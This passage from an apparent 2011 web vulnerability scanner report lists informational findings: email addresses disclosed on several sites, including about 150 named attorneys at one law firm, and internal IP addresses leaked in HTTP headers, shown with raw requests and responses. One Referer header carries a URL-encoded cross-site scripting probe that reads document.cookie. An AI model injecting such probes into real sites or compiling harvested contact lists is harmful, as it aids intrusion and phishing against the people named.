22.84. http://www.soundpatheview.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundpatheview.com
Path:	/

Issue detail

The following email address was disclosed in the response:

info@soundpath.net

Request

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:25:02 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/4.4.9
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 4191

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
<a href="mailto:info@soundpath.net?subject=Soundpath e-View">
...[SNIP]...

22.85. http://www.stroock.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.stroock.com
Path:	/

Issue detail

The following email address was disclosed in the response:

kzerbe@rubenstein.com

Request

Response

22.86. http://www.tpg.com/contact.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tpg.com
Path:	/contact.html

Issue detail

The following email address was disclosed in the response:

owen@blicksilverpr.com

Request

GET /contact.html HTTP/1.1
Host: www.tpg.com
Proxy-Connection: keep-alive
Referer: http://www.tpg.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 9294
Content-Type: text/html
Last-Modified: Mon, 02 May 2011 16:00:04 GMT
Accept-Ranges: bytes
ETag: "b32b590e28cc1:4e5d1"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 11:24:23 GMT

<html>
<head>
<title>TPG : About TPG</title>
<meta name="description" content="TPG">
<meta name="keywords" content="TPG">
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
...[SNIP]...
<a href="mailto:owen@blicksilverpr.com" class="HeaderBlue"><u>owen@blicksilverpr.com</u>
...[SNIP]...

22.87. http://www.tuckerellis.com/attorneys/index previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tuckerellis.com
Path:	/attorneys/index

Issue detail

The following email addresses were disclosed in the response:

alec.boyd@tuckerellis.com
amanda.villalobos@tuckerellis.com
anne.cruz@tuckerellis.com
anne.kordas@tuckerellis.com
anthony.brosamle@tuckerellis.com
arun.kottha@tuckerellis.com
avril.love@tuckerellis.com
ayesha.hardaway@tuckerellis.com
bart.kessel@tuckerellis.com
benjamin.sasse@tuckerellis.com
brenda.sweet@tuckerellis.com
brent.culhane@tuckerellis.com
brian.fitzsimons@tuckerellis.com
carter.strang@tuckerellis.com
charles.socha@tuckerellis.com
chelsea.mikula@tuckerellis.com
christopher.caryl@tuckerellis.com
clifford.mendelsohn@tuckerellis.com
corena.larimer@tuckerellis.com
courtenay.youngblood@tuckerellis.com
curt.isler@tuckerellis.com
daniel.kelly@tuckerellis.com
daniel.wright@tuckerellis.com
drew.odum@tuckerellis.com
dylan.carson@tuckerellis.com
ed.duncan@tuckerellis.com
edward.taber@tuckerellis.com
erica.james@tuckerellis.com
erica.mcgregor@tuckerellis.com
ernest.auciello@tuckerellis.com
eugene.killeen@tuckerellis.com
evan.nelson@tuckerellis.com
ferlin.ruiz@tuckerellis.com
frank.garritano@tuckerellis.com
frank.osborne@tuckerellis.com
gary.dinner@tuckerellis.com
glenn.morrical@tuckerellis.com
gregory.feldkamp@tuckerellis.com
harry.cornett@tuckerellis.com
henry.billingsley@tuckerellis.com
hugh.stanley@tuckerellis.com
irene.keyse-walker@tuckerellis.com
irene.macdougall@tuckerellis.com
j.hobart@tuckerellis.com
jack.goldwood@tuckerellis.com
jaclyn.bryk@tuckerellis.com
jane.warner@tuckerellis.com
janice.hugener@tuckerellis.com
jeffrey.healy@tuckerellis.com
jeffrey.whitesell@tuckerellis.com
jennifer.berlin@tuckerellis.com
jennifer.stueber@tuckerellis.com
jennifer.woloschyn@tuckerellis.com
jesse.thomas@tuckerellis.com
jessica.warren@tuckerellis.com
john.doheny@tuckerellis.com
john.favret@tuckerellis.com
john.garred@tuckerellis.com
john.palumbo@tuckerellis.com
john.patterson@tuckerellis.com
john.simon@tuckerellis.com
john.son@tuckerellis.com
jon.oebker@tuckerellis.com
jonathan.cooper@tuckerellis.com
joseph.morford@tuckerellis.com
joshua.wes@tuckerellis.com
juliana.crist@tuckerellis.com
julie.callsen@tuckerellis.com
jully.yoon@tuckerellis.com
justin.rice@tuckerellis.com
jweiler@tuckerellis.com
karen.ross@tuckerellis.com
karl.bekeny@tuckerellis.com
kathleen.atkinson@tuckerellis.com
keith.raker@tuckerellis.com
kevin.burns@tuckerellis.com
kevin.young@tuckerellis.com
kim.west@tuckerellis.com
kristen.mayer@tuckerellis.com
lance.wilson@tuckerellis.com
larry.callaghan@tuckerellis.com
larry.donovan@tuckerellis.com
leslie.criswell@tuckerellis.com
lillian.ma@tuckerellis.com
linda.gonzalez@tuckerellis.com
mark.mccarthy@tuckerellis.com
martin.lewis@tuckerellis.com
mary.stiles@tuckerellis.com
matthew.kaplan@tuckerellis.com
matthew.moriarty@tuckerellis.com
michael.anderton@tuckerellis.com
michael.brink@tuckerellis.com
michael.climaco@tuckerellis.com
michael.elliott@tuckerellis.com
michael.harris@tuckerellis.com
michael.hudzinski@tuckerellis.com
michael.ruttinger@tuckerellis.com
michael.zellers@tuckerellis.com
michele.anderson@tuckerellis.com
michelle.marvinney@tuckerellis.com
mollie.benedict@tuckerellis.com
monee.takla@tuckerellis.com
monica.williams@tuckerellis.com
nathan.newman@tuckerellis.com
nicholas.york@tuckerellis.com
nicole.gage@tuckerellis.com
nicole.leblanc@tuckerellis.com
nicole.lewis@tuckerellis.com
pat.pascarella@tuckerellis.com
patricia.fennelly@tuckerellis.com
patricia.seifert@tuckerellis.com
paul.smith@tuckerellis.com
peggy.doyle@tuckerellis.com
peter.voudouris@tuckerellis.com
preeti.singh@tuckerellis.com
rebecca.biernat@tuckerellis.com
rebecca.gutierrez@tuckerellis.com
rebecca.lefler@tuckerellis.com
rennie.rutman@tuckerellis.com
richard.dean@tuckerellis.com
rita.maimbourg@tuckerellis.com
robert.cutbirth@tuckerellis.com
robert.dixon@tuckerellis.com
robert.frost@tuckerellis.com
robert.hanna@tuckerellis.com
robert.loesch@tuckerellis.com
robert.tucker@tuckerellis.com
samantha.tisdale@tuckerellis.com
sandy.eloranto@tuckerellis.com
sanford.watson@tuckerellis.com
sara.beede@tuckerellis.com
sarah.trankiem@tuckerellis.com
scott.kelly@tuckerellis.com
scott.wilkov@tuckerellis.com
seth.wamelink@tuckerellis.com
soo.lin@tuckerellis.com
stephanie.rodeno@tuckerellis.com
stephen.ellis@tuckerellis.com
su-lyn.combs@tuckerellis.com
susan.audey@tuckerellis.com
susan.mizer@tuckerellis.com
susan.racey@tuckerellis.com
tariq.naeem@tuckerellis.com
thomas.baker@tuckerellis.com
thomas.cheswick@tuckerellis.com
thomas.coffey@tuckerellis.com
thomas.simmons@tuckerellis.com
todd.chayet@tuckerellis.com
victoria.vance@tuckerellis.com
william.berglund@tuckerellis.com
william.dance@tuckerellis.com
william.lutz@tuckerellis.com

Request

GET /attorneys/index?first_name=&last_name=&law_school=0&practice=0&office=0&language=0&admission=0&industry=0&affiliation=0&school=0&keywords=&action=attorneys&submit.x=41&submit.y=7 HTTP/1.1
Host: www.tuckerellis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.tuckerellis.com/attorneys/search
Cookie: __utma=58675247.1267848493.1305202904.1305202904.1305202904.1; __utmb=58675247.6.10.1305202904; __utmc=58675247; __utmz=58675247.1305202904.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Tucker%20Ellis%20%26%20West

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:23:55 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 83996

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a href="mailto:michele.anderson@tuckerellis.com" title="Email K. Michele Anderson">
...[SNIP]...
<a href="mailto:michael.anderton@tuckerellis.com" title="Email Michael Anderton">
...[SNIP]...
<a href="mailto:kathleen.atkinson@tuckerellis.com" title="Email Kathleen A. Atkinson">
...[SNIP]...
<a href="mailto:ernest.auciello@tuckerellis.com" title="Email Ernest W. Auciello, Jr.">
...[SNIP]...
<a href="mailto:susan.audey@tuckerellis.com" title="Email Susan M. Audey">
...[SNIP]...
<a href="mailto:thomas.baker@tuckerellis.com" title="Email Thomas W. Baker">
...[SNIP]...
<a href="mailto:sara.beede@tuckerellis.com" title="Email Sara K. Beede">
...[SNIP]...
<a href="mailto:karl.bekeny@tuckerellis.com" title="Email Karl A. Bekeny">
...[SNIP]...
<a href="mailto:mollie.benedict@tuckerellis.com" title="Email Mollie F. Benedict">
...[SNIP]...
<a href="mailto:william.berglund@tuckerellis.com" title="Email William H. Berglund">
...[SNIP]...
<a href="mailto:jennifer.berlin@tuckerellis.com" title="Email Jennifer W. Berlin">
...[SNIP]...
<a href="mailto:rebecca.biernat@tuckerellis.com" title="Email Rebecca M. Biernat">
...[SNIP]...
<a href="mailto:henry.billingsley@tuckerellis.com" title="Email Henry E. Billingsley, II">
...[SNIP]...
<a href="mailto:alec.boyd@tuckerellis.com" title="Email Alec H. Boyd">
...[SNIP]...
<a href="mailto:nicole.lewis@tuckerellis.com" title="Email Nicole E. Braden Lewis">
...[SNIP]...
<a href="mailto:michael.brink@tuckerellis.com" title="Email Michael C. Brink">
...[SNIP]...
<a href="mailto:anthony.brosamle@tuckerellis.com" title="Email Anthony D. Brosamle">
...[SNIP]...
<a href="mailto:jaclyn.bryk@tuckerellis.com" title="Email Jaclyn A. Bryk">
...[SNIP]...
<a href="mailto:kevin.burns@tuckerellis.com" title="Email Kevin T. Burns">
...[SNIP]...
<a href="mailto:larry.callaghan@tuckerellis.com" title="Email Lawrence A. Callaghan">
...[SNIP]...
<a href="mailto:julie.callsen@tuckerellis.com" title="Email Julie A. Callsen">
...[SNIP]...
<a href="mailto:dylan.carson@tuckerellis.com" title="Email Dylan M. Carson">
...[SNIP]...
<a href="mailto:christopher.caryl@tuckerellis.com" title="Email Christopher J. Caryl">
...[SNIP]...
<a href="mailto:todd.chayet@tuckerellis.com" title="Email E. Todd Chayet">
...[SNIP]...
<a href="mailto:thomas.cheswick@tuckerellis.com" title="Email Thomas R. Cheswick">
...[SNIP]...
<a href="mailto:michael.climaco@tuckerellis.com" title="Email Michael L. Climaco">
...[SNIP]...
<a href="mailto:thomas.coffey@tuckerellis.com" title="Email Thomas W. Coffey">
...[SNIP]...
<a href="mailto:su-lyn.combs@tuckerellis.com" title="Email Su-Lyn Combs">
...[SNIP]...
<a href="mailto:jonathan.cooper@tuckerellis.com" title="Email Jonathan R. Cooper">
...[SNIP]...
<a href="mailto:harry.cornett@tuckerellis.com" title="Email Harry D. Cornett, Jr.">
...[SNIP]...
<a href="mailto:juliana.crist@tuckerellis.com" title="Email Juliana V. Crist">
...[SNIP]...
<a href="mailto:leslie.criswell@tuckerellis.com" title="Email Leslie E. Criswell">
...[SNIP]...
<a href="mailto:anne.cruz@tuckerellis.com" title="Email Anne Swoboda Cruz">
...[SNIP]...
<a href="mailto:brent.culhane@tuckerellis.com" title="Email Brent E. Culhane">
...[SNIP]...
<a href="mailto:robert.cutbirth@tuckerellis.com" title="Email Robert A. Cutbirth">
...[SNIP]...
<a href="mailto:william.dance@tuckerellis.com" title="Email William H. Dance">
...[SNIP]...
<a href="mailto:richard.dean@tuckerellis.com" title="Email Richard A. Dean">
...[SNIP]...
<a href="mailto:gary.dinner@tuckerellis.com" title="Email Gary L. Dinner">
...[SNIP]...
<a href="mailto:robert.dixon@tuckerellis.com" title="Email Robert K. Dixon">
...[SNIP]...
<a href="mailto:john.doheny@tuckerellis.com" title="Email John T. Doheny">
...[SNIP]...
<a href="mailto:larry.donovan@tuckerellis.com" title="Email Larry B. Donovan">
...[SNIP]...
<a href="mailto:peggy.doyle@tuckerellis.com" title="Email Peggy S. Doyle">
...[SNIP]...
<a href="mailto:ed.duncan@tuckerellis.com" title="Email Ed E. Duncan">
...[SNIP]...
<a href="mailto:michael.elliott@tuckerellis.com" title="Email Michael E. Elliott">
...[SNIP]...
<a href="mailto:stephen.ellis@tuckerellis.com" title="Email Stephen C. Ellis">
...[SNIP]...
<a href="mailto:sandy.eloranto@tuckerellis.com" title="Email Sandy M. Eloranto">
...[SNIP]...
<a href="mailto:john.favret@tuckerellis.com" title="Email John A. Favret, III">
...[SNIP]...
<a href="mailto:gregory.feldkamp@tuckerellis.com" title="Email Gregory P. Feldkamp">
...[SNIP]...
<a href="mailto:patricia.fennelly@tuckerellis.com" title="Email Patricia A. Fennelly">
...[SNIP]...
<a href="mailto:brian.fitzsimons@tuckerellis.com" title="Email Brian W. FitzSimons">
...[SNIP]...
<a href="mailto:robert.frost@tuckerellis.com" title="Email Robert S. Frost">
...[SNIP]...
<a href="mailto:nicole.gage@tuckerellis.com" title="Email Nicole E. Gage">
...[SNIP]...
<a href="mailto:john.garred@tuckerellis.com" title="Email John X. Garred">
...[SNIP]...
<a href="mailto:frank.garritano@tuckerellis.com" title="Email Frank O. Garritano">
...[SNIP]...
<a href="mailto:jack.goldwood@tuckerellis.com" title="Email Jack J. Goldwood">
...[SNIP]...
<a href="mailto:rebecca.gutierrez@tuckerellis.com" title="Email Rebecca Winder Gutierrez">
...[SNIP]...
<a href="mailto:robert.hanna@tuckerellis.com" title="Email Robert J. Hanna">
...[SNIP]...
<a href="mailto:ayesha.hardaway@tuckerellis.com" title="Email Ayesha B. Hardaway">
...[SNIP]...
<a href="mailto:michael.harris@tuckerellis.com" title="Email Michael F. Harris">
...[SNIP]...
<a href="mailto:jeffrey.healy@tuckerellis.com" title="Email Jeffrey A. Healy">
...[SNIP]...
<a href="mailto:j.hobart@tuckerellis.com" title="Email Jean A. Hobart">
...[SNIP]...
<a href="mailto:michael.hudzinski@tuckerellis.com" title="Email Michael E. Hudzinski">
...[SNIP]...
<a href="mailto:janice.hugener@tuckerellis.com" title="Email Janice Rourke Hugener">
...[SNIP]...
<a href="mailto:curt.isler@tuckerellis.com" title="Email Curtiss L. Isler">
...[SNIP]...
<a href="mailto:erica.james@tuckerellis.com" title="Email Erica M. James">
...[SNIP]...
<a href="mailto:matthew.kaplan@tuckerellis.com" title="Email Matthew I. Kaplan">
...[SNIP]...
<a href="mailto:scott.kelly@tuckerellis.com" title="Email Scott J. Kelly">
...[SNIP]...
<a href="mailto:daniel.kelly@tuckerellis.com" title="Email Daniel J. Kelly">
...[SNIP]...
<a href="mailto:bart.kessel@tuckerellis.com" title="Email Bart L. Kessel">
...[SNIP]...
<a href="mailto:irene.keyse-walker@tuckerellis.com" title="Email Irene C. Keyse-Walker">
...[SNIP]...
<a href="mailto:eugene.killeen@tuckerellis.com" title="Email Eugene M. Killeen">
...[SNIP]...
<a href="mailto:anne.kordas@tuckerellis.com" title="Email Anne M. Kordas">
...[SNIP]...
<a href="mailto:arun.kottha@tuckerellis.com" title="Email Arun J. Kottha">
...[SNIP]...
<a href="mailto:corena.larimer@tuckerellis.com" title="Email Corena G. Larimer">
...[SNIP]...
<a href="mailto:nicole.leblanc@tuckerellis.com" title="Email Nicole M. LeBlanc">
...[SNIP]...
<a href="mailto:rebecca.lefler@tuckerellis.com" title="Email Rebecca A. Lefler">
...[SNIP]...
<a href="mailto:martin.lewis@tuckerellis.com" title="Email Martin H. Lewis">
...[SNIP]...
<a href="mailto:soo.lin@tuckerellis.com" title="Email Soo Yun Lin">
...[SNIP]...
<a href="mailto:robert.loesch@tuckerellis.com" title="Email Robert M. Loesch">
...[SNIP]...
<a href="mailto:avril.love@tuckerellis.com" title="Email Avril G. Love">
...[SNIP]...
<a href="mailto:william.lutz@tuckerellis.com" title="Email William J. Lutz">
...[SNIP]...
<a href="mailto:lillian.ma@tuckerellis.com" title="Email Lillian C. Ma">
...[SNIP]...
<a href="mailto:irene.macdougall@tuckerellis.com" title="Email Irene M. MacDougall">
...[SNIP]...
<a href="mailto:rita.maimbourg@tuckerellis.com" title="Email Rita A. Maimbourg">
...[SNIP]...
<a href="mailto:michelle.marvinney@tuckerellis.com" title="Email Michelle Powe Marvinney">
...[SNIP]...
<a href="mailto:kristen.mayer@tuckerellis.com" title="Email Kristen L. Mayer">
...[SNIP]...
<a href="mailto:mark.mccarthy@tuckerellis.com" title="Email Mark F. McCarthy">
...[SNIP]...
<a href="mailto:erica.mcgregor@tuckerellis.com" title="Email Erica E. McGregor">
...[SNIP]...
<a href="mailto:clifford.mendelsohn@tuckerellis.com" title="Email Clifford S. Mendelsohn">
...[SNIP]...
<a href="mailto:chelsea.mikula@tuckerellis.com" title="Email Chelsea R. Mikula">
...[SNIP]...
<a href="mailto:susan.mizer@tuckerellis.com" title="Email Susan L. Mizer">
...[SNIP]...
<a href="mailto:joseph.morford@tuckerellis.com" title="Email Joseph J. Morford">
...[SNIP]...
<a href="mailto:matthew.moriarty@tuckerellis.com" title="Email Matthew P. Moriarty">
...[SNIP]...
<a href="mailto:glenn.morrical@tuckerellis.com" title="Email Glenn E. Morrical">
...[SNIP]...
<a href="mailto:tariq.naeem@tuckerellis.com" title="Email Tariq M. Naeem">
...[SNIP]...
<a href="mailto:evan.nelson@tuckerellis.com" title="Email Evan C. Nelson">
...[SNIP]...
<a href="mailto:nathan.newman@tuckerellis.com" title="Email Nathan T. Newman">
...[SNIP]...
<a href="mailto:drew.odum@tuckerellis.com" title="Email Drew Odum">
...[SNIP]...
<a href="mailto:jon.oebker@tuckerellis.com" title="Email Jon W. Oebker">
...[SNIP]...
<a href="mailto:frank.osborne@tuckerellis.com" title="Email Frank R. Osborne">
...[SNIP]...
<a href="mailto:john.palumbo@tuckerellis.com" title="Email John P. Palumbo">
...[SNIP]...
<a href="mailto:pat.pascarella@tuckerellis.com" title="Email Patrick J. Pascarella">
...[SNIP]...
<a href="mailto:john.patterson@tuckerellis.com" title="Email John P. Patterson">
...[SNIP]...
<a href="mailto:susan.racey@tuckerellis.com" title="Email Susan L. Racey">
...[SNIP]...
<a href="mailto:keith.raker@tuckerellis.com" title="Email Keith H. Raker">
...[SNIP]...
<a href="mailto:justin.rice@tuckerellis.com" title="Email Justin E. Rice">
...[SNIP]...
<a href="mailto:stephanie.rodeno@tuckerellis.com" title="Email Stephanie C. Rodeno">
...[SNIP]...
<a href="mailto:linda.gonzalez@tuckerellis.com" title="Email Linda G. Ronan">
...[SNIP]...
<a href="mailto:karen.ross@tuckerellis.com" title="Email Karen E. Ross">
...[SNIP]...
<a href="mailto:ferlin.ruiz@tuckerellis.com" title="Email Ferlin P. Ruiz">
...[SNIP]...
<a href="mailto:rennie.rutman@tuckerellis.com" title="Email Rennie C. Rutman">
...[SNIP]...
<a href="mailto:michael.ruttinger@tuckerellis.com" title="Email Michael J. Ruttinger">
...[SNIP]...
<a href="mailto:benjamin.sasse@tuckerellis.com" title="Email Benjamin C. Sasse">
...[SNIP]...
<a href="mailto:patricia.seifert@tuckerellis.com" title="Email Patricia L. Seifert">
...[SNIP]...
<a href="mailto:thomas.simmons@tuckerellis.com" title="Email Thomas R. Simmons">
...[SNIP]...
<a href="mailto:john.simon@tuckerellis.com" title="Email John A. Simon">
...[SNIP]...
<a href="mailto:preeti.singh@tuckerellis.com" title="Email Preeti K. Singh">
...[SNIP]...
<a href="mailto:paul.smith@tuckerellis.com" title="Email Paul W. Smith">
...[SNIP]...
<a href="mailto:charles.socha@tuckerellis.com" title="Email Charles Q. Socha">
...[SNIP]...
<a href="mailto:john.son@tuckerellis.com" title="Email John K. Son">
...[SNIP]...
<a href="mailto:hugh.stanley@tuckerellis.com" title="Email Hugh M. Stanley">
...[SNIP]...
<a href="mailto:mary.stiles@tuckerellis.com" title="Email Mary Hirschauer Stiles">
...[SNIP]...
<a href="mailto:carter.strang@tuckerellis.com" title="Email Carter E. Strang">
...[SNIP]...
<a href="mailto:jennifer.stueber@tuckerellis.com" title="Email Jennifer L. Stueber">
...[SNIP]...
<a href="mailto:brenda.sweet@tuckerellis.com" title="Email Brenda A. Sweet">
...[SNIP]...
<a href="mailto:edward.taber@tuckerellis.com" title="Email Edward E. Taber">
...[SNIP]...
<a href="mailto:monee.takla@tuckerellis.com" title="Email Monee A. Takla">
...[SNIP]...
<a href="mailto:jesse.thomas@tuckerellis.com" title="Email Jesse W. Thomas">
...[SNIP]...
<a href="mailto:samantha.tisdale@tuckerellis.com" title="Email Samantha Tisdale">
...[SNIP]...
<a href="mailto:sarah.trankiem@tuckerellis.com" title="Email Sarah C. Trankiem">
...[SNIP]...
<a href="mailto:robert.tucker@tuckerellis.com" title="Email Robert C. Tucker">
...[SNIP]...
<a href="mailto:victoria.vance@tuckerellis.com" title="Email Victoria L. Vance">
...[SNIP]...
<a href="mailto:amanda.villalobos@tuckerellis.com" title="Email Amanda Villalobos">
...[SNIP]...
<a href="mailto:peter.voudouris@tuckerellis.com" title="Email S. Peter Voudouris">
...[SNIP]...
<a href="mailto:seth.wamelink@tuckerellis.com" title="Email Seth H. Wamelink">
...[SNIP]...
<a href="mailto:jane.warner@tuckerellis.com" title="Email Jane F. Warner">
...[SNIP]...
<a href="mailto:jessica.warren@tuckerellis.com" title="Email Jessica L. Warren">
...[SNIP]...
<a href="mailto:sanford.watson@tuckerellis.com" title="Email Sanford E. Watson">
...[SNIP]...
<a href="mailto:jweiler@tuckerellis.com" title="Email Jeffry L. Weiler">
...[SNIP]...
<a href="mailto:joshua.wes@tuckerellis.com" title="Email Joshua J. Wes">
...[SNIP]...
<a href="mailto:kim.west@tuckerellis.com" title="Email Kim W. West">
...[SNIP]...
<a href="mailto:jeffrey.whitesell@tuckerellis.com" title="Email Jeffrey M. Whitesell">
...[SNIP]...
<a href="mailto:scott.wilkov@tuckerellis.com" title="Email Scott J. Wilkov">
...[SNIP]...
<a href="mailto:monica.williams@tuckerellis.com" title="Email Monica D. Williams">
...[SNIP]...
<a href="mailto:lance.wilson@tuckerellis.com" title="Email Lance Wilson">
...[SNIP]...
<a href="mailto:jennifer.woloschyn@tuckerellis.com" title="Email Jennifer R. Woloschyn">
...[SNIP]...
<a href="mailto:daniel.wright@tuckerellis.com" title="Email Daniel K. Wright, II">
...[SNIP]...
<a href="mailto:jully.yoon@tuckerellis.com" title="Email Jully Yoon">
...[SNIP]...
<a href="mailto:nicholas.york@tuckerellis.com" title="Email Nicholas C. York">
...[SNIP]...
<a href="mailto:kevin.young@tuckerellis.com" title="Email Kevin M. Young">
...[SNIP]...
<a href="mailto:courtenay.youngblood@tuckerellis.com" title="Email Courtenay Youngblood Jalics">
...[SNIP]...
<a href="mailto:michael.zellers@tuckerellis.com" title="Email Michael C. Zellers">
...[SNIP]...

22.88. http://www.tuckerellis.com/attorneys/k-anderson previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tuckerellis.com
Path:	/attorneys/k-anderson

Issue detail

The following email address was disclosed in the response:

michele.anderson@tuckerellis.com

Request

GET /attorneys/k-anderson HTTP/1.1
Host: www.tuckerellis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.tuckerellis.com/attorneys/index?first_name=&last_name=&law_school=0&practice=0&office=0&language=0&admission=0&industry=0&affiliation=0&school=0&keywords=&action=attorneys&submit.x=41&submit.y=7
Cookie: __utma=58675247.1267848493.1305202904.1305202904.1305202904.1; __utmb=58675247.7.10.1305202904; __utmc=58675247; __utmz=58675247.1305202904.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Tucker%20Ellis%20%26%20West

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:24:01 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 14241

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a href="mailto:michele.anderson@tuckerellis.com" title="Email Attorney">
...[SNIP]...

22.89. http://www.vcprodatabase.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vcprodatabase.com
Path:	/favicon.ico

Issue detail

The following email address was disclosed in the response:

support@vcprodatabase.com

Request

Response

23. Private IP addresses disclosed previous next
There are 18 instances of this issue:

http://connect.facebook.net/en_US/all.js
http://connect.facebook.net/en_US/all.js
http://meter-svc.nytimes.com/meter.js
http://static.ak.fbcdn.net/connect/xd_proxy.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.google.com/sdch/vD843DpA.dct

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.

23.1. http://connect.facebook.net/en_US/all.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://connect.facebook.net
Path:	/en_US/all.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.33.26.114

Request

GET /en_US/all.js HTTP/1.1
Host: connect.facebook.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/09/private-equity-has-a-horse-in-this-race/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
If-None-Match: "f6002135b2a7a45a20f6832033a03c19"

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
ETag: "db0e54357e9bac109c4a31ec215f595b"
X-FB-Server: 10.33.26.114
X-Cnection: close
Cache-Control: public, max-age=971
Expires: Thu, 12 May 2011 11:19:21 GMT
Date: Thu, 12 May 2011 11:03:10 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 118049

/*1305152601,169941618,JIT Construction: v377111,en_US*/

if(!window.FB)window.FB={_apiKey:null,_session:null,_userStatus:'unknown',_logging:true,_inCanvas:((window.location.search.indexOf('fb_sig_in_
...[SNIP]...

23.2. http://connect.facebook.net/en_US/all.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://connect.facebook.net
Path:	/en_US/all.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.32.104.129

Request

GET /en_US/all.js HTTP/1.1
Host: connect.facebook.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topicse7f31%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ed4e86dd7255/mergers-acquisitions/

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
ETag: "db0e54357e9bac109c4a31ec215f595b"
X-FB-Server: 10.32.104.129
X-Cnection: close
Cache-Control: public, max-age=653
Expires: Thu, 12 May 2011 11:36:57 GMT
Date: Thu, 12 May 2011 11:26:04 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 118049

/*1305178497,169896065,JIT Construction: v377111,en_US*/

